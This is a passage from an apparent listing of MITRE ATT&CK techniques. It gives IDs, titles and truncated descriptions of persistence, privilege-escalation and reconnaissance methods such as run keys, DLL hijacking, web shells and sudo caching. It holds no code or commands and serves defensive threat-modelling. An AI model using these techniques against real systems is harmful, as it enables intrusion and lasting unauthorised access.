A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL …
T1015
PersistenceAccessibility Features
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on …
T1019
PersistenceSystem Firmware
The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as …
T1023
PersistenceShortcut Modification
Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed …
T1031
PersistenceModify Existing Service
Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified …
T1034
PersistencePath Interception
**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** …
T1037
PersistenceBoot or Logon Initialization Scripts
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) …
T1037.001
PersistenceLogon Script (Windows)
Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user …
T1037.002
PersistenceLogin Hook
Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific …
T1037.003
PersistenceNetwork Logon Script
Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group …
T1037.004
PersistenceRC Scripts
Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start …
T1037.005
PersistenceStartup Items
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and …
T1038
PersistenceDLL Search Order Hijacking
Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of …
T1042
PersistenceChange Default File Association
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections …
T1044
PersistenceFile System Permissions Weakness
Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing …
T1050
PersistenceNew Service
When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, …
T1058
PersistenceService Registry Permissions Weakness
Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a …
T1060
PersistenceRegistry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the …
T1062
PersistenceHypervisor
**This technique has been deprecated and should no longer be used.** A type-1 hypervisor is a software layer that sits between the guest operating systems …
T1067
PersistenceBootkit
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record …
T1084
PersistenceWindows Management Instrumentation Event Subscription
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may …
T1098
PersistenceAccount Manipulation
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access …
T1098.001
PersistenceAdditional Cloud Credentials
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may …
T1098.002
PersistenceAdditional Email Delegate Permissions
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange …
T1098.003
PersistenceAdditional Cloud Roles
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update …
T1098.004
PersistenceSSH Authorized Keys
Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to …
T1098.005
PersistenceDevice Registration
Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, …
T1098.006
PersistenceAdditional Container Cluster Roles
An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For …
T1098.007
PersistenceAdditional Local or Domain Groups
An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain. On Windows, accounts …
T1100
PersistenceWeb Shell
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server …
T1101
PersistenceSecurity Support Provider
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs …
T1103
PersistenceAppInit DLLs
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every …
T1128
PersistenceNetsh Helper DLL
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to …
T1131
PersistenceAuthentication Package
Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple …
T1133
PersistenceExternal Remote Services
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow …
T1136
PersistenceCreate Account
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may …
T1136.001
PersistenceLocal Account
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote …
T1136.002
PersistenceDomain Account
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and …
T1136.003
PersistenceCloud Account
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish …
T1137
PersistenceOffice Application Startup
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise …
T1137.001
PersistenceOffice Template Macros
Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and …
T1137.002
PersistenceOffice Test
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows …
T1137.003
PersistenceOutlook Forms
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook …
T1137.004
PersistenceOutlook Home Page
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize …
T1137.005
PersistenceOutlook Rules
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email …
T1137.006
PersistenceAdd-ins
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: …
T1138
PersistenceApplication Shimming
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. …
T1156
PersistenceMalicious Shell Modification
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session …
T1157
PersistenceDylib Hijacking
macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries …
T1159
PersistenceLaunch Agent
Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from …
T1160
PersistenceLaunch Daemon
Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each …
T1161
PersistenceLC_LOAD_DYLIB Addition
Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O …
T1162
PersistenceLogin Item
MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and …
T1163
PersistenceRc.common
During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line …
T1164
PersistenceRe-opened Applications
Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually …
T1165
PersistenceStartup Items
Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration …
T1168
PersistenceLocal Job Scheduling
On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: …
T1176
PersistenceSoftware Extensions
Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software …
T1176.001
PersistenceBrowser Extensions
Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to …
T1176.002
PersistenceIDE Extensions
Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio …
T1179
PersistenceHooking
Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link …
T1180
PersistenceScreensaver
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia …
T1182
PersistenceAppCert DLLs
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application …
T1209
PersistenceTime Providers
The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time …
T1215
PersistenceKernel Modules and Extensions
Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of …
T1501
PersistenceSystemd Service
Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also …
T1504
PersistencePowerShell Profile
Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell …
T1505
PersistenceServer Software Component
Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to …
T1505.001
PersistenceSQL Stored Procedures
Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that …
T1505.002
PersistenceTransport Agent
Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport …
T1505.003
PersistenceWeb Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on …
T1505.004
PersistenceIIS Components
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality …
T1505.005
PersistenceTerminal Services DLL
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server …
T1505.006
PersistencevSphere Installation Bundles
Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual …
T1519
PersistenceEmond
Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) …
T1525
PersistenceImplant Internal Image
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine …
T1542.001
PersistenceSystem Firmware
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) …
T1542.002
PersistenceComponent Firmware
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will …
T1542.003
PersistenceBootkit
Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious …
T1543
PersistenceCreate or Modify System Process
Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes …
T1543.001
PersistenceLaunch Agent
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process …
T1543.002
PersistenceSystemd Service
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used …
T1543.003
PersistenceWindows Service
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications …
T1543.004
PersistenceLaunch Daemon
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, …
T1543.005
PersistenceContainer Service
Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for …
T1546.017
PersistenceUdev Rules
Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles …
T1546.018
PersistencePython Startup Hooks
Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed …
T1547
PersistenceBoot or Logon Autostart Execution
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. …
T1547.001
PersistenceRegistry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the …
T1547.002
PersistenceAuthentication Package
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process …
T1547.003
PersistenceTime Providers
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft …
T1547.004
PersistenceWinlogon Helper DLL
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at …
T1547.005
PersistenceSecurity Support Provider
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) …
T1547.006
PersistenceKernel Modules and Extensions
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and …
T1547.007
PersistenceRe-opened Applications
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS …
T1547.008
PersistenceLSASS Driver
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and …
T1547.009
PersistenceShortcut Modification
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference …
T1547.010
PersistencePort Monitors
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set …
T1547.011
PersistencePlist Modification
Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to …
T1547.012
PersistencePrint Processors
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by …
T1547.013
PersistenceXDG Autostart Entries
Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart …
T1547.014
PersistenceActive Setup
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is …
T1547.015
PersistenceLogin Items
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections …
T1554
PersistenceCompromise Host Software Binary
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and …
T1574
PersistenceHijack Execution Flow
Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, …
T1574.001
PersistenceDLL
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data …
T1574.002
PersistenceDLL Side-Loading
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just …
T1574.004
PersistenceDylib Hijacking
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at …
T1574.005
PersistenceExecutable Installer File Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of …
T1574.006
PersistenceDynamic Linker Hijacking
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of …
T1574.007
PersistencePath Interception by PATH Environment Variable
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User …
T1574.008
PersistencePath Interception by Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs …
T1574.009
PersistencePath Interception by Unquoted Path
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing …
T1574.010
PersistenceServices File Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to …
T1574.011
PersistenceServices Registry Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services …
T1574.012
PersistenceCOR_PROFILER
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework …
T1574.013
PersistenceKernelCallbackTable
Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher …
T1574.014
PersistenceAppDomainManager
Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and …
T1653
PersistencePower Settings
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a …
T1668
PersistenceExclusive Control
Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat …
T1671
PersistenceCloud Application Integration
Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the …
T1068
Privilege EscalationExploitation for Privilege Escalation
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming …
T1166
Privilege EscalationSetuid and Setgid
When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges …
T1169
Privilege EscalationSudo
The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other …
T1178
Privilege EscalationSID-History Injection
The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security …
T1183
Privilege EscalationImage File Execution Options Injection
Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an …
T1206
Privilege EscalationSudo Caching
The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) …
T1514
Privilege EscalationElevated Execution with Prompt
Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give …
T1546
Privilege EscalationEvent Triggered Execution
Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and …
T1546.001
Privilege EscalationChange Default File Association
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open …
T1546.002
Privilege EscalationScreensaver
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and …
T1546.003
Privilege EscalationWindows Management Instrumentation Event Subscription
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to …
T1546.004
Privilege EscalationUnix Shell Configuration Modification
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the …
T1546.005
Privilege EscalationTrap
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will …
T1546.006
Privilege EscalationLC_LOAD_DYLIB Addition
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used …
T1546.007
Privilege EscalationNetsh Helper DLL
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used …
T1546.008
Privilege EscalationAccessibility Features
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a …
T1546.009
Privilege EscalationAppCert DLLs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in …
T1546.010
Privilege EscalationAppInit DLLs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in …
T1546.011
Privilege EscalationApplication Shimming
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created …
T1546.012
Privilege EscalationImage File Execution Options Injection
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach …
T1546.013
Privilege EscalationPowerShell Profile
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when …
T1546.014
Privilege EscalationEmond
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts …
T1546.015
Privilege EscalationComponent Object Model Hijacking
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to …
T1546.016
Privilege EscalationInstaller Packages
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain …
T1548
Privilege EscalationAbuse Elevation Control Mechanism
Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to …
T1548.001
Privilege EscalationSetuid and Setgid
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and …
T1548.002
Privilege EscalationBypass User Account Control
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as …
T1548.003
Privilege EscalationSudo and Sudo Caching
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn …
T1548.004
Privilege EscalationElevated Execution with Prompt
Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give …
T1548.005
Privilege EscalationTemporary Elevated Cloud Access
Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or …
T1611
Privilege EscalationEscape to Host
Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other …
T1589
ReconnaissanceGather Victim Identity Information
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal …
T1589.001
ReconnaissanceCredentials
Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization …
T1589.002
ReconnaissanceEmail Addresses
Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for …
T1589.003
ReconnaissanceEmployee Names
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide …
T1590
ReconnaissanceGather Victim Network Information
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative …
T1590.001
ReconnaissanceDomain Properties
Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety …
T1590.002
ReconnaissanceDNS
Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name …
T1590.003
ReconnaissanceNetwork Trust Dependencies
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of …
T1590.004
ReconnaissanceNetwork Topology
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, …
T1590.005
ReconnaissanceIP Addresses
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a …
T1590.006
ReconnaissanceNetwork Security Appliances
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety …
T1591
ReconnaissanceGather Victim Org Information
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including …
T1591.001
ReconnaissanceDetermine Physical Locations
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety …
T1591.002
ReconnaissanceBusiness Relationships
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety …
T1591.003
ReconnaissanceIdentify Business Tempo
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety …
T1591.004
ReconnaissanceIdentify Roles
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a …
T1592
ReconnaissanceGather Victim Host Information
Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative …
T1592.001
ReconnaissanceHardware
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details …
T1592.002
ReconnaissanceSoftware
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details …
T1592.003
ReconnaissanceFirmware
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details …
T1592.004
ReconnaissanceClient Configurations
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details …
T1593
ReconnaissanceSearch Open Websites/Domains
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in …
T1593.001
ReconnaissanceSocial Media
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim …
T1593.002
ReconnaissanceSearch Engines
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index …
T1593.003
ReconnaissanceCode Repositories
Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party …
T1594
ReconnaissanceSearch Victim-Owned Websites
Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including …
T1595
ReconnaissanceActive Scanning
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure …
T1595.001
ReconnaissanceScanning IP Blocks
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, …
T1595.002
ReconnaissanceVulnerability Scanning
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software …
T1595.003
ReconnaissanceWordlist Scanning
Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of …
T1596
ReconnaissanceSearch Open Technical Databases
Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online …
T1596.001
ReconnaissanceDNS/Passive DNS
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered …
T1596.002
ReconnaissanceWHOIS
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) …
T1596.003
ReconnaissanceDigital Certificates
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority …
T1596.004
ReconnaissanceCDNs
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a …
T1596.005
ReconnaissanceScan Databases
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of …
T1597
ReconnaissanceSearch Closed Sources
Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. …
T1597.001
ReconnaissanceThreat Intel Vendors
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or …
T1597.002
ReconnaissancePurchase Technical Data
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources …
T1598
ReconnaissancePhishing for Information
Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into …
T1598.001
ReconnaissanceSpearphishing Service
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to …
T1598.002
ReconnaissanceSpearphishing Attachment
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt …
T1598.003
ReconnaissanceSpearphishing Link
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt …
T1598.004
ReconnaissanceSpearphishing Voice
Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into …
T1681
ReconnaissanceSearch Threat Vendor Data
Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries …
T1583
Resource DevelopmentAcquire Infrastructure
